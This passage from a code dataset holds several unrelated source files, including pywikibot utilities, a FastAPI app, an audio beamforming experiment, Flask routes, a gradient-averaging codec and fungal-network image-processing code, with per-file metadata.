item):\n raise TypeError(\"Cannot add '%s' to ThreadList\" % type(item))\n\n def active_count(self):\n \"\"\"Return the number of alive threads, and delete all non-alive ones.\"\"\"\n count = 0\n for item in list(self):\n if item.isAlive():\n count += 1\n else:\n self.remove(item)\n return count\n\n def append(self, thd):\n if not isinstance(thd, threading.Thread):\n raise TypeError(\"Cannot append '%s' to ThreadList\" % type(thd))\n while self.active_count() >= self.limit:\n time.sleep(2)\n list.append(self, thd)\n thd.start()\n\n\nclass CombinedError(KeyError, IndexError):\n\n \"\"\"An error that gets caught by both KeyError and IndexError.\"\"\"\n\n\nclass EmptyDefault(str, Mapping):\n\n \"\"\"\n A default for a not existing siteinfo property.\n\n It should be chosen if there is no better default known. 
It acts like an\n empty collections, so it can be iterated through it savely if treated as a\n list, tuple, set or dictionary. It is also basically an empty string.\n\n Accessing a value via __getitem__ will result in an combined KeyError and\n IndexError.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialise the default as an empty string.\"\"\"\n str.__init__(self)\n\n def _empty_iter(self):\n \"\"\"An iterator which does nothing and drops the argument.\"\"\"\n return empty_iterator()\n\n def __getitem__(self, key):\n \"\"\"Raise always a L{CombinedError}.\"\"\"\n raise CombinedError(key)\n\n iteritems = itervalues = iterkeys = __iter__ = _empty_iter\n\n\nEMPTY_DEFAULT = EmptyDefault()\n\n\ndef deprecated(instead=None):\n \"\"\"Decorator to output a method deprecation warning.\n\n @param instead: if provided, will be used to specify the replacement\n @type instead: string\n \"\"\"\n def decorator(method):\n def wrapper(*args, **kwargs):\n funcname = method.__name__\n classname = args[0].__class__.__name__\n if instead:\n warning(u\"%s.%s is DEPRECATED, use %s instead.\"\n % (classname, funcname, instead))\n else:\n warning(u\"%s.%s is DEPRECATED.\" % (classname, funcname))\n return method(*args, **kwargs)\n wrapper.__name__ = method.__name__\n return wrapper\n return decorator\n\n\ndef deprecate_arg(old_arg, new_arg):\n \"\"\"Decorator to declare old_arg deprecated and replace it with new_arg.\"\"\"\n _logger = \"\"\n\n def decorator(method):\n def wrapper(*__args, **__kw):\n meth_name = method.__name__\n if old_arg in __kw:\n if new_arg:\n if new_arg in __kw:\n warning(\nu\"%(new_arg)s argument of %(meth_name)s replaces %(old_arg)s; cannot use both.\"\n % locals())\n else:\n warning(\nu\"%(old_arg)s argument of %(meth_name)s is deprecated; use %(new_arg)s instead.\"\n % locals())\n __kw[new_arg] = __kw[old_arg]\n else:\n debug(\nu\"%(old_arg)s argument of %(meth_name)s is deprecated.\"\n % locals(), _logger)\n del __kw[old_arg]\n return method(*__args, **__kw)\n wrapper.__doc__ = method.__doc__\n wrapper.__name__ = method.__name__\n return wrapper\n return decorator\n\n\ndef redirect_func(target, source_module=None, target_module=None):\n \"\"\"\n Return a function which can be used to redirect to 'target'.\n\n It also acts like marking that function deprecated and copies all\n parameters.\n\n @param target: The targeted function which is to be executed.\n @type target: callable\n @param source_module: The module of the old function. If '.' defaults\n to target_module. If 'None' (default) it tries to guess it from the\n executing function.\n @type source_module: basestring\n @param target_module: The module of the target function. If\n 'None' (default) it tries to get it from the target. Might not work\n with nested classes.\n @type target_module: basestring\n @return: A new function which adds a warning prior to each execution.\n @rtype: callable\n \"\"\"\n class Wrapper(object):\n def __init__(self, function, source, target):\n self._function = function\n self.parameters = {'new': function.__name__,\n 'target': target,\n 'source': source}\n self.warning = ('{source}{new} is DEPRECATED, use {target}{new} '\n 'instead.').format(**self.parameters)\n\n def call(self, *a, **kw):\n warning(self.warning)\n return self._function(*a, **kw)\n\n if target_module is None:\n target_module = target.__module__\n if hasattr(target, '__self__'):\n target_module += '.' 
+ target.__self__.__class__.__name__\n if target_module and target_module[-1] != '.':\n target_module += '.'\n if source_module is '.':\n source_module = target_module\n elif source_module and source_module[-1] != '.':\n source_module += '.'\n else:\n source_module = (sys._getframe(1).f_code.co_filename.rsplit(\"/\", 1)[0]\n .replace(\"/\", \".\") + \".\")\n return Wrapper(target, source_module, target_module).call\n\n\nif __name__ == \"__main__\":\n def _test():\n import doctest\n doctest.testmod()\n _test()\n","sub_path":"pywikibot/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":11884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"16068617","text":"# backend/main.py\n\nfrom typing import Optional\n\nimport uvicorn\nfrom fastapi import FastAPI\n\nfrom api import notes, inference, upload\nfrom database.db import engine, metadata, database\n\nmetadata.create_all(engine)\n\n\ndef create_application() -> FastAPI:\n application = FastAPI()\n application.include_router(inference.router, prefix='/transfer', tags=[\"styles\"])\n application.include_router(upload.router, prefix='/upload', tags=[\"upload\"])\n application.include_router(notes.router, prefix=\"/notes\", tags=[\"notes\"])\n return application\n\n\napp = create_application()\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"message\": \"Welcome from the API\"}\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8080)\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218783130","text":"'''\nGoogle Speech Commands Dataset\n=================\n\nPyroomacoustics includes a wrapper around the Google Speech Commands dataset [TODO add reference].\n'''\n\nimport sys\nimport numpy as np\nimport os.path\nsys.path.append(\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nimport pyroomacoustics as pra\nimport os, argparse\n# import pyroomacoustics.datasets.utils as utils\nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile \n\n# import tf and functions for labelling\nimport tensorflow as tf\n\nfrom tensorflow.contrib.framework.python.ops import audio_ops as contrib_audio\n\ndef load_graph(f):\n with tf.gfile.FastGFile(f,'rb') as graph:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(graph.read())\n tf.import_graph_def(graph_def, name='')\n\n\ndef load_labels(f):\n return [line.rstrip() for line in tf.gfile.GFile(f)]\n\n\ndef run_graph(wav_data, labels, index, how_many_labels=3, verbose=False):\n with tf.Session() as session:\n softmax_tensor = session.graph.get_tensor_by_name(\"labels_softmax:0\")\n predictions, = session.run(softmax_tensor,{\"wav_data:0\": wav_data})\n\n top_k = predictions.argsort()[-how_many_labels:][::-1]\n for node_id in top_k:\n human_string = labels[node_id]\n score = predictions[node_id]\n if verbose:\n print('%s (score = %.5f)' % (human_string, score))\n return predictions[index]\n\n\n\ndef label_wav(wav,labels,graph,word):\n \"\"\"\n Requires WAV file to be coded as int16\n \"\"\"\n\n if not wav or not tf.gfile.Exists(wav):\n tf.logging.fatal('Audio file does not exist %s',wav)\n if not labels or not tf.gfile.Exists(labels):\n tf.logging.fatal('Labels 
file does not exist %s', labels)\n if not graph or not tf.gfile.Exists(graph):\n tf.logging.fatal('Graph file does not exist %s', graph)\n\n labels_list = load_labels(labels)\n load_graph(graph)\n\n with open(wav,'rb') as wav_file:\n wav_data = wav_file.read()\n index = labels_list.index(word)\n return run_graph(wav_data,labels_list,index)\n\n\nif __name__ == '__main__':\n\n dest_dir = \"bf_output\"\n labels_file = \"conv_labels.txt\"\n graph_file = \"my_frozen_graph.pb\"\n max_order = 3\n absorption_fact = 0.2\n room_dim = [4,6]\n snr_vals = np.arange(20,-30,-5)\n desired_word = 'yes'\n pos_source = [1,4.5]\n pos_noise = [2.8,4.3]\n fft_len = 1024\n\n # use circular array with center mic\n center = np.array([2,1.5])\n radius = 0.2\n R = pra.circular_2D_array(center, M=6, phi0=0, radius=radius)\n R = np.concatenate((R, np.array(center, ndmin=2).T), axis=1)\n\n # visualize the setup\n room = pra.ShoeBox(room_dim, absorption=absorption_fact, max_order=max_order)\n room.add_source(pos_source)\n room.add_source(pos_noise)\n room.add_microphone_array(pra.Beamformer(R, room.fs, N=fft_len))\n room.mic_array.rake_delay_and_sum_weights(room.sources[0][:1])\n room.plot(freq=[500, 1000, 2000, 4000], img_order=0)\n plt.title(\"Simulation setup and polar patterns\")\n plt.legend(['500', '1000', '2000', '4000'])\n plt.grid()\n\n #create object\n dataset = pra.datasets.GoogleSpeechCommands(download=True,subset=1)\n\n #separate the noise and the speech samples\n noise_samps = dataset.filter(speech=0)\n speech_samps = dataset.filter(speech=1)\n speech_samps = speech_samps.filter(word=desired_word)\n\n #pick one of each from WAV\n speech_samp = speech_samps[0]\n noise_samp = noise_samps[0]\n print()\n print(\"SPEECH FILE INFO :\")\n print(speech_samp)\n print(\"NOISE FILE INFO :\")\n print(noise_samp)\n print()\n\n #creating a noisy_signal array for each snr value\n speech_file_location = speech_samp.meta.file_loc\n noise_file_location = noise_samp.meta.file_loc\n\n \"\"\"\n Beamform original signal.\n \n First the room with only the signal.\n \"\"\"\n fs_s, speech = wavfile.read(speech_file_location)\n input_type = speech.dtype\n try:\n IN_MAX_VAL = max(np.iinfo(input_type).max, abs(np.iinfo(input_type).min))\n except:\n IN_MAX_VAL = max(np.finfo(input_type).max, abs(np.finfo(input_type).min))\n\n room_sig = pra.ShoeBox(room_dim, absorption=absorption_fact, fs=fs_s, \n max_order=max_order)\n room_sig.add_source(pos_source, signal=speech)\n room_sig.add_microphone_array(pra.Beamformer(R, fs_s, N=fft_len))\n room_sig.simulate()\n room_sig.mic_array.rake_delay_and_sum_weights(room_sig.sources[0][:1])\n speech_bf = room_sig.mic_array.process()\n\n room_sig.plot(freq=[500, 1000, 2000, 4000], img_order=0)\n plt.title(\"Room (signal)\")\n plt.legend(['500', '1000', '2000', '4000'])\n plt.grid()\n\n \"\"\"\n Now the room with just the noise. 
MUST BE SAME BEAMFORMER\n \"\"\"\n fs_n, noise = wavfile.read(noise_file_location)\n if fs_s != fs_n:\n raise ValueError(\"Sampling frequencies not equal!\")\n room_noise = pra.ShoeBox(room_dim, absorption=absorption_fact, fs=fs_n, \n max_order=max_order)\n room_noise.add_source(pos_noise, signal=noise)\n room_noise.add_microphone_array(pra.Beamformer(R, fs_n, N=fft_len))\n room_noise.simulate()\n room_noise.mic_array.rake_delay_and_sum_weights(room_sig.sources[0][:1])\n noise_bf = room_noise.mic_array.process()\n\n room_noise.plot(freq=[500, 1000, 2000, 4000], img_order=0)\n plt.title(\"Room (noise)\")\n plt.legend(['500', '1000', '2000', '4000'])\n plt.grid()\n\n \"\"\"\n We wish to compute the SNR wrt to same (single) microphone. Let's use the\n center microphone.\n \"\"\"\n ref_mic_sig = room_sig.mic_array.signals[-1,:]\n ref_mic_noise = room_noise.mic_array.signals[-1,:]\n\n # truncate noise to same length\n ref_mic_noise = ref_mic_noise[:len(ref_mic_sig)]\n\n # norm factor for signal and noise\n sig_lvl = np.linalg.norm(ref_mic_sig)\n noise_norm_fact = np.linalg.norm(ref_mic_noise)\n snr_facts = sig_lvl * 10**(-snr_vals/20) / noise_norm_fact # multiple noise by this\n\n # make sure factors computed correctly\n print()\n print(\"CHECKING THAT SNR FACTORS ARE COMPUTED CORRECTLY\")\n for idx, fact in enumerate(snr_facts):\n signal_lvl = np.linalg.norm(ref_mic_sig)\n noise_lvl = np.linalg.norm(ref_mic_noise * fact)\n print(\"Expected SNR : %f\" % snr_vals[idx])\n snr_db = 20*np.log10(signal_lvl/noise_lvl)\n print(\"SNR : %f\" % snr_db)\n\n \"\"\"\n Weight and add beamformed output from signal and noise to simulate beamforming\n under different SNRs.\n \"\"\"\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n\n # truncate beamformed noise\n noise_bf = noise_bf[:len(speech_bf)]\n\n # compute score for different SNR vals\n print()\n score_beamformed = np.empty(len(snr_vals))\n score_single = np.empty(len(snr_vals))\n for idx, snr in enumerate(snr_vals):\n\n noisy_signal = speech_bf + snr_facts[idx]*noise_bf\n noisy_signal = pra.normalize(pra.highpass(noisy_signal, fs_s), bits=16).astype(np.int16)\n dest = os.path.join(dest_dir,\"das_bf_snr_db_%d.wav\" %(snr))\n wavfile.write(dest, fs_s, noisy_signal)\n score_beamformed[idx] = label_wav(dest, labels_file, graph_file, \n speech_samp.meta.word)\n\n # compute score for single mic for reference\n single_mic = ref_mic_sig + snr_facts[idx]*ref_mic_noise\n single_mic = pra.normalize(pra.highpass(single_mic, fs_s), bits=16).astype(np.int16)\n dest = os.path.join(dest_dir,\"single_mic_snr_db_%d.wav\" %(snr))\n wavfile.write(dest, fs_s, single_mic)\n score_single[idx] = label_wav(dest, labels_file, graph_file, \n speech_samp.meta.word)\n\n\n plt.figure()\n plt.plot(snr_vals,score_beamformed, label=\"beamformed signal\")\n plt.plot(snr_vals,score_single, label=\"single mic (center)\")\n plt.legend()\n plt.grid()\n plt.ylabel(\"Score\")\n plt.xlabel(\"SNR [dB]\")\n plt.title('Classification for : ' + speech_samp.meta.word)\n\n plt.show()\n \n\n\n","sub_path":"examples/snr_vs_classification_das_bf.py","file_name":"snr_vs_classification_das_bf.py","file_ext":"py","file_size_in_byte":7941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243614425","text":"# encoding='utf-8'\n\nfrom selenium import webdriver as web\n\nchromePath = r'd:/chromedriver.exe'\naccessPath = 'http://httpbin.org/ip'\nproxyBaseStr = '--proxy-server='\nproxyIP = '113.65.5.225'\nproxyPORT = 8118\nproxyStr = 
proxyBaseStr+proxyIP+':'+str(proxyPORT)\nprint(proxyStr)\noptions = web.ChromeOptions()\noptions.add_argument(proxyStr)\n\ndriver = web.Chrome(executable_path=chromePath, chrome_options=options)\ndriver.get(accessPath)\nprint(driver.current_url)\n\n","sub_path":"before/python3/练习1/proxy11.py","file_name":"proxy11.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640681030","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nmpl.rc(\"font\",family='Arial')\nfn={'fontname':'Arial'}\nfs_lab=15\nfs_tit=19\nfs_leg=12\n\np0b=np.arange(28,200,1)\np0s=0.00600535*p0b-0.28950578\ndc=0.08# np.arange(0.01,0.2,0.001)\nw=dc*p0b\ndw=1.#np.arange(0.1,15,0.1)\nsnm=10 # np.arange(10,100)\nyoffsum=1.\nsig=1. \ndsig=(snm/sig)*np.sqrt((p0s/120.)*yoffsum**2 + (dw/((2*sig)*(p0b-w)))**2)\ndwer=snm*dw/w\ndpi=(np.sqrt(p0s/120.))*p0b/np.sqrt(w)\ndpo=p0b/(np.sqrt(w*(p0b-w)))\ndsnm=np.sqrt(dpo**2+dsig**2+dwer**2+dpi**2)\nplt.figure(figsize=(6.5,4.5))\nxplt=p0b\nplt.plot(xplt,(np.zeros(len(xplt))+dpi)/snm,label=r'$dp_{i}$',ls='--')\nplt.plot(xplt,(np.zeros(len(xplt))+dpo)/snm,label=r'$dp_{off}$',ls='--')\nplt.plot(xplt,(np.zeros(len(xplt))+dsig)/snm,label=r'$d\\sigma_{off}$',ls='--')\nplt.plot(xplt,(np.zeros(len(xplt))+dwer)/snm,label=r'$dW$',ls='--')\nplt.plot(xplt,dsnm/snm,label=r'$dS/N$')\nplt.legend(fontsize=fs_leg,loc='upper left')\nplt.suptitle('Normalized error vs. Spin Period',fontsize=fs_tit)\nplt.xlabel('Spin Period [bins]',fontsize=fs_lab)\nplt.ylabel('dS/N / S/N',fontsize=fs_lab)\nplt.show()\n","sub_path":"error_plotter.py","file_name":"error_plotter.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"476784278","text":"import os\nimport csv\nimport wget\nimport numpy as np\n\nannotation_file_name = 'annotations.csv'\nurl = \"https://anomaly-recordings.s3.us-west-2.amazonaws.com\"\n\nos.makedirs('videos', exist_ok=True)\n\nwith open(annotation_file_name, mode='r', encoding='utf-8-sig') as csv_read_file:\n csv_reader = csv.DictReader(csv_read_file)\n\n for line in csv_reader:\n if line['video'] not in (None, \"\", '[]') and not os.path.exists('videos/' + line['video']):\n try:\n wget.download(url + '/' + line['video'], 'videos')\n except:\n print('Video file not found for row in annotation file' + line['video'])\n exit()","sub_path":"preprocessing/download_videos.py","file_name":"download_videos.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"48609775","text":"from flask import Blueprint, jsonify\nfrom webargs.flaskparser import use_kwargs\n\nfrom core.db import save_item\nfrom core.db.users import get_user_by_id\nfrom core.db.users.model import UserModel\n\nfrom services.users.resource import user_registration_schema, user_display_schema\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nblueprint = Blueprint('users', __name__)\n\n\n@blueprint.route('/users/signup', methods=[\"POST\"])\n@use_kwargs(user_registration_schema, locations=('json',))\ndef create_new_user(**kwargs):\n user = UserModel(id=kwargs.get('user_sub'),\n email=kwargs.get('email'),\n first_name=kwargs.get('first_name'),\n last_name=kwargs.get('last_name'))\n save_item(user)\n\n response = jsonify(user_display_schema.dump(user))\n response.status_code = 201\n\n return 
response\n\n\n@blueprint.route('/users/', methods=[\"GET\"])\ndef get_user(user_id):\n user = get_user_by_id(user_id)\n response = user_display_schema.dump(user)\n\n return jsonify(response)\n\n\n# @blueprint.route('/users//join/', methods=[\"POST\"])\n# @use_kwargs(user_join_org_schema, locations=('json',))\n# def join_org(user_id, org_id):\n# # Check user existence\n# user = get_user_by_id(user_id)\n#\n# # Check organization existence\n# org = get_organization_from_db(org_id)\n#\n# # Update the user's organization ID\n# actions = [UserModel.organization_id.set(org.id)]\n# update_item(user, actions)\n#\n# response = jsonify(user_display_schema.dump(user))\n# response.status_code = 201\n#\n# return response\n","sub_path":"services/users/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140563333","text":"from codec.interfaces import ICommunication_Ctrl\nfrom codec.essential import Block_Weight\nfrom codec.interfaces import netEncapsulation\n\nfrom profiles.settings import GlobalSettings\n\n\nclass myComCtrl(ICommunication_Ctrl):\n def __init__(self, node_id):\n super().__init__()\n # 保存并记录本节点编号信息,除此之外再也没有其他地方可以获取该信息\n self.__node_id = node_id\n self.__global_weights = 0\n self.__current_recv = 0\n\n def dispose(self):\n print('my communication controller is disposed.')\n\n def update_blocks(self, block_weight: Block_Weight):\n print('Weights delta received.')\n print('from block: {}'.format(block_weight.Block_ID))\n print('It has a content with shape: {}'.format(block_weight.Content.shape))\n\n # 获取没有该数据的节点\n send_to = block_weight.Adversary_ID\n # 我们使用 'data' 字符串来标记我们的梯度内容\n pkg = {\n 'data': block_weight.Content\n }\n # 记录本机梯度\n self.__global_weights += block_weight.Content\n self.__current_recv += 1\n # 检查是否接受完所有数据\n self.__do_grad_average()\n # 发送梯度\n yield netEncapsulation(send_to, pkg)\n\n def receive_blocks(self, content: dict):\n print('I have received an package.')\n print('It has a content with shape: {}'.format(content['data'].shape))\n # 记录梯度内容\n self.__global_weights += content['data']\n # 记录已经接收到多少个梯度了\n self.__current_recv += 1\n # 检查是否接受完所有数据\n self.__do_grad_average()\n\n def __do_grad_average(self):\n how_much_nodes = GlobalSettings.get_default().node_count\n if self.__current_recv == how_much_nodes:\n # 执行梯度平均\n self.set_result(self.__global_weights / how_much_nodes)\n # 重设梯度值,等待下一批次的循环\n self.__global_weights = 0\n self.__current_recv = 0","sub_path":"codec/tutorial_codec.py","file_name":"tutorial_codec.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514005125","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\n\n@asyncio.coroutine\ndef get(*args, **kw):\n session = aiohttp.ClientSession()\n resp = yield from session.get(*args, **kw)\n return (yield from resp.text())\n\ndef post_url(webpage):\n soup = BeautifulSoup(webpage)\n post_id = [a.attrs.get('data-threads-id') for a in soup.select('[class~=h-threads-item]')]\n print(post_id)\n for id in post_id:\n return 'http://kukuku.cc/t/' + str(id)\n\n@asyncio.coroutine\ndef save_image(url):\n webpage = yield from get(url)\n print(post_url(webpage))\n\nif '__main__' == __name__:\n urls = {'http://kukuku.cc/综合版1/page={}'.format(i) for i in range(1,10)}\n loop = asyncio.get_event_loop()\n 
loop.run_until_complete(asyncio.wait([save_image(url) for url in urls]))\n","sub_path":"kkk_aiohttp.py","file_name":"kkk_aiohttp.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542997408","text":"import sys\r\nfrom amftrack.util.sys import get_dirname, pastis_path, fiji_path, path_code, temp_path\r\nimport pandas as pd\r\nimport shutil\r\nfrom scipy import sparse\r\nfrom datetime import datetime\r\nfrom amftrack.pipeline.functions.image_processing.experiment_class_surf import orient\r\nimport scipy.io as sio\r\nimport cv2 as cv\r\nimport imageio.v2 as imageio\r\nimport numpy as np\r\nfrom skimage.filters import frangi\r\nfrom skimage import filters\r\nimport scipy.sparse\r\nimport os\r\nfrom time import time\r\nfrom skimage.feature import hessian_matrix_det\r\nfrom amftrack.pipeline.functions.image_processing.extract_graph import (\r\n from_sparse_to_graph,\r\n generate_nx_graph,\r\n)\r\nfrom bresenham import bresenham\r\nfrom time import time_ns\r\nimport subprocess\r\nimport cv2\r\n\r\n\r\ndef streline(linelen, degrees):\r\n theta = degrees % 180 * np.pi / 180\r\n ray = (linelen - 1) / 2\r\n x = int(np.round((linelen - 1) / 2 * np.cos(theta)))\r\n y = -int(np.round((linelen - 1) / 2 * np.sin(theta)))\r\n points = np.array(list(bresenham(0, 0, x, y)))\r\n c, r = np.concatenate((-np.flip(points[:, 0]), [0], points[:, 0])), np.concatenate(\r\n (-np.flip(points[:, 1]), [0], points[:, 1])\r\n )\r\n M = 2 * np.max(np.abs(r)) + 1\r\n N = 2 * np.max(np.abs(c)) + 1\r\n line = np.zeros((M, N))\r\n x0 = np.expand_dims((r + np.max(np.abs(r))), 1)\r\n y0 = np.expand_dims((c + np.max(np.abs(c))), 1)\r\n line[x0, y0] = 1\r\n return line\r\n\r\n\r\ndef stredisk(radius):\r\n return cv.getStructuringElement(cv.MORPH_ELLIPSE, (2 * radius - 1, 2 * radius - 1))\r\n\r\n\r\ndef remove_component(dilated, min_size=4000):\r\n nb_components, output, stats, centroids = cv.connectedComponentsWithStats(\r\n dilated.astype(np.uint8), connectivity=8\r\n )\r\n # connectedComponentswithStats yields every seperated component with information on each of them, such as size\r\n # the following part is just taking out the background which is also considered a component, but most of the time we don't want that.\r\n sizes = stats[1:, -1]\r\n nb_components = nb_components - 1\r\n\r\n # minimum size of particles we want to keep (number of pixels)\r\n # here, it's a fixed value, but you can set it as you want, eg the mean of the sizes or whatever\r\n\r\n # your answer image\r\n img_f = np.zeros((dilated.shape))\r\n # for every component in the image, you keep it only if it's above min_size\r\n for i in range(0, nb_components):\r\n if sizes[i] >= min_size:\r\n img_f[output == i + 1] = 1\r\n return np.array(255 * img_f, dtype=np.uint8)\r\n\r\n\r\ndef bowler_hat(im, no, si):\r\n o = np.linspace(0, 180, no)\r\n imol = np.zeros((im.shape[0], im.shape[1], len(si), no))\r\n imod = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n for i in range(0, len(si)):\r\n for j in range(0, no):\r\n se = streline(si[i], o[j]).astype(np.uint8)\r\n imol[:, :, i, j] = cv.morphologyEx(im, cv.MORPH_OPEN, se)\r\n se = stredisk(int(np.round(si[i] / 2))).astype(np.uint8)\r\n imod[:, :, i] = cv.morphologyEx(im, cv.MORPH_OPEN, se)\r\n imd = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n imr = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n imm = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n triv = imod == 0\r\n for i in range(len(si)):\r\n imm[:, :, 
i] = np.max(np.squeeze(imol[:, :, i, :]), axis=2)\r\n imd[:, :, i] = imm[:, :, i] - imod[:, :, i]\r\n imr[triv] = 0\r\n imda = np.max(imd, axis=2)\r\n imda = np.double(imda)\r\n imda = (imda - np.min(imda[:])) / (np.max(imda[:]) - np.min(imda[:]))\r\n return imda\r\n\r\n\r\ndef extract_skel_new_prince(im, params, perc_low, perc_high):\r\n bowled = bowler_hat(-im.astype(np.uint8), 32, params)\r\n filename = time_ns()\r\n place_save = temp_path\r\n to_smooth = np.minimum(bowled * 255, 255 - im)\r\n # to_smooth = 255-im\r\n imtransformed_path = f\"{place_save}/{filename}.tif\"\r\n imageio.imsave(imtransformed_path, to_smooth.astype(np.uint8))\r\n path_anis = pastis_path\r\n args = [0.1, 7, 0.9, 10, 50]\r\n command = [path_anis, imtransformed_path] + args\r\n command = [str(elem) for elem in command]\r\n print(\"anis filtering\")\r\n process = subprocess.run(command, cwd=place_save, stdout=subprocess.DEVNULL)\r\n foldname = (\r\n f\"{filename}_ani-K{int(args[0]*10)}s{args[1]}g{int(args[2]*10)}itD{args[3]}\"\r\n )\r\n imname = foldname + f\"/{foldname}it{args[4]}.tif\"\r\n path_modif = place_save + \"/\" + imname\r\n try:\r\n im2 = imageio.imread(path_modif)\r\n except:\r\n im2 = to_smooth.astype(np.uint8)\r\n print(\"image_reading\")\r\n shutil.rmtree(os.path.join(place_save, foldname))\r\n low = max(20, np.percentile(im2, perc_low))\r\n high = max(90, np.percentile(im2, perc_high))\r\n transformed = im2\r\n hyst = filters.apply_hysteresis_threshold(transformed, low, high)\r\n dilated = remove_holes(hyst)\r\n dilated = dilated.astype(np.uint8)\r\n connected = remove_component(dilated)\r\n # os.remove(imtransformed_path)\r\n return connected\r\n\r\n\r\ndef extend_tip(skeletonized, dilated, dist):\r\n img2 = np.zeros((dilated.shape))\r\n nx_g = generate_nx_graph(\r\n from_sparse_to_graph(scipy.sparse.dok_matrix(skeletonized))\r\n )\r\n g, pos = nx_g\r\n tips = [node for node in g.nodes if g.degree(node) == 1]\r\n dilated_bis = np.copy(img2)\r\n for tip in tips:\r\n branch = np.array(\r\n orient(g.get_edge_data(*list(g.edges(tip))[0])[\"pixel_list\"], pos[tip])\r\n )\r\n orientation = branch[0] - branch[min(branch.shape[0] - 1, 20)]\r\n orientation = orientation / (np.linalg.norm(orientation))\r\n window = 20\r\n x, y = pos[tip][0], pos[tip][1]\r\n if (\r\n x - window >= 0\r\n and x + window < dilated.shape[0]\r\n and y - window >= 0\r\n and y + window < dilated.shape[1]\r\n ):\r\n shape_tip = dilated[x - window : x + window, y - window : y + window]\r\n # dist = 20\r\n for i in range(dist):\r\n pixel = (pos[tip] + orientation * i).astype(int)\r\n xp, yp = pixel[0], pixel[1]\r\n if (\r\n xp - window >= 0\r\n and xp + window < dilated.shape[0]\r\n and yp - window >= 0\r\n and yp + window < dilated.shape[1]\r\n ):\r\n dilated_bis[\r\n xp - window : xp + window, yp - window : yp + window\r\n ] += shape_tip\r\n kernel = np.ones((3, 3), np.uint8)\r\n dilation = cv.dilate(dilated_bis.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv.erode(\r\n dilation.astype(np.uint8) * 255, kernel, iterations=2\r\n ) # recent addition for agg, careful\r\n return dilation > 0\r\n\r\n\r\ndef remove_holes(hyst):\r\n kernel = np.ones((3, 3), np.uint8)\r\n dilation = cv.dilate(hyst.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv.erode(dilation.astype(np.uint8) * 255, kernel, 
iterations=1)\r\n dilation = cv.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n return dilation > 0\r\n\r\n\r\ndef extract_skel_tip_ext(im, low, high, dist):\r\n im_cropped = im\r\n # im_blurred =cv2.GaussianBlur(im_cropped, (201, 201),50)\r\n im_blurred = cv2.blur(im_cropped, (200, 200))\r\n im_back_rem = (\r\n (im_cropped)\r\n / ((im_blurred == 0) * np.ones(im_blurred.shape) + im_blurred)\r\n * 120\r\n )\r\n im_back_rem[im_back_rem >= 130] = 130\r\n # im_back_rem = im_cropped*1.0\r\n # # im_back_rem = cv2.normalize(im_back_rem, None, 0, 255, cv2.NORM_MINMAX)\r\n frangised = frangi(im_back_rem, sigmas=range(1, 20, 4)) * 255\r\n # # frangised = cv2.normalize(frangised, None, 0, 255, cv2.NORM_MINMAX)\r\n hessian = hessian_matrix_det(im_back_rem, sigma=20)\r\n blur_hessian = cv2.blur(abs(hessian), (20, 20))\r\n # transformed = (frangised+cv2.normalize(blur_hessian, None, 0, 255, cv2.NORM_MINMAX)-im_back_rem+120)*(im_blurred>=35)\r\n # transformed = (frangised+cv2.normalize(abs(hessian), None, 0, 255, cv2.NORM_MINMAX)-im_back_rem+120)*(im_blurred>=35)\r\n transformed = (frangised - im_back_rem + 120) * (im_blurred >= 35)\r\n\r\n lowt = (transformed > low).astype(int)\r\n hight = (transformed > high).astype(int)\r\n hyst = filters.apply_hysteresis_threshold(transformed, low, high)\r\n kernel = np.ones((3, 3), np.uint8)\r\n dilation = cv2.dilate(hyst.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv2.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv2.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilated = dilation > 0\r\n\r\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(\r\n 